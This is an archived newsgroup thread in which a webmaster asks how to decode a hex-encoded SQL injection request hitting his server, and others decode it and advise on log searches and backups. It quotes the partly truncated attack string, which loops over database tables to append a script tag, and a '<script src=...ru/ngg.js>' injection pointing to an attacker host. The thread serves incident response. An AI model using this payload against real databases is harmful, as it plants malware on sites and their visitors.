sql injection gibberish
shank
How can I convert the below gibberish into code I can understand?
I'd like to know what they are throwin' at me.
title=A&bt=1;DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST(0x4445434C415245204054205641524348415228323535292C40432056415
2434841522832353529204445434C415245205461626C655F437572736F7220
435552534F5220464F522053454C45435420612E6E616D652C622E6E616D6520
46524F4D207379736F626A6563747320612C737973636F6C756D6E7320622057
4845524520612E69643D622E696420414E4420612E78747970653D27752720414
E442028622E78747970653D3939204F5220622E78747970653D3335204F52206...
thanks
SQL Menace
http://sqlblog.com/blogs/denis_gobo/archive/2008/06/25/7491.aspx
Denis The SQL Menace
http://www.lessthandot.com/
http://sqlservercode.blogspot.com
http://sqlblog.com/blogs/denis_gobo/default.aspx
On Jul 14, 8:49 am, "shank" <sh...@tampabay.rr.com> wrote:
> I'm finally winning against the script injection attacks.
>
> How can I convert the below gibberish into code I can understand?
> I'd like to know what they are throwin' at me.
>
> title=A&bt=1;DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST(0x4445434C415245204054205641524348415228323535292C40432056415
Plamen Ratchev
SQL injection attack:
http://blogs.technet.com/neilcar/archive/2008/03/15/anatomy-of-a-sql-injection-incident-part-2-meat.aspx
HTH,
Plamen Ratchev
http://www.SQLStudio.com
Mike C#
DECLARE @S VARCHAR(4000);SET @S='DECLARE @T VARCHAR(255),@C VARCHAR(255)
DECLARE Table_Cursor CURSOR FOR SELECT a.name,b.name FROM sysobjects
a,syscolumns b WHERE a.id=b.id AND a.xtype='u' AND (b.xtype=99 OR b.xtype=35
OR ...
Hackers + Dynamic SQL + Cursors ==> Wow. The best of all possible worlds.
--
========
Michael Coles
"Pro SQL Server 2008 XML"
http://www.amazon.com/Pro-SQL-Server-2008-XML/dp/1590599837/
"shank" <sh...@tampabay.rr.com> wrote in message
news:O9gJ1fb...@TK2MSFTNGP05.phx.gbl...
Eric Isaacs
PRINT CAST(0x4445434C415245204
054205641524348415228323535292C40432056415
2434841522832353529204445434C415245205461626C655F437572736F7220
435552534F5220464F522053454C45435420612E6E616D652C622E6E616D6520
46524F4D207379736F626A6563747320612C737973636F6C756D6E7320622057
4845524520612E69643D622E696420414E4420612E78747970653D27752720414
E442028622E78747970653D3939204F5220622E78747970653D3335204F52206...
AS VARCHAR(8000))
...to see what it's converts to in VARCHAR.
-Eric Isaacs
shank
thanks
"Mike C#" <x...@xyz.com> wrote in message
news:ubf3QGe5...@TK2MSFTNGP06.phx.gbl...
Michael Coles
> OK... much appreciated... but how did you translate?
> thanks
I just did a SELECT CAST(<insert binary string here> AS VARCHAR(MAX)). You
were probably getting gibberish if you were trying to convert the exact
string you posted since it has an odd number of characters. Delete the 6
from the end and try again.
shank
How can I encode the following: <script
src=http://www.xxxxx.ru/ngg.js></script>
So I can make it easier to find the entry in the logs? They're hittin' my
server through a dozen sites all day long. I've go them down to 95%
failures. But I still get that one that gets through and I need to find
which page is being assaulted. It would be easier if I could search for the
exact encoded characters.
thanks
================================
"Eric Isaacs" <eis...@gmail.com> wrote in message
news:4bcd7b5b-09e1-43ef...@k30g2000hse.googlegroups.com...
Eric Isaacs
SELECT CAST('<script src=http://www.xxxxx.ru/ngg.js></script>' AS
VARBINARY)
You could also convert/cast the binary to string and search that
result for it as well.
Make sure that the infected fields aren't truncated too. Some of
these SQL injection attacks truncated data when they appended the
scripts. So you may have lost data as well, and removing the scripts
won't fix everything. A DB backup may be the only way to fix some of
them.
-Eric Isaacs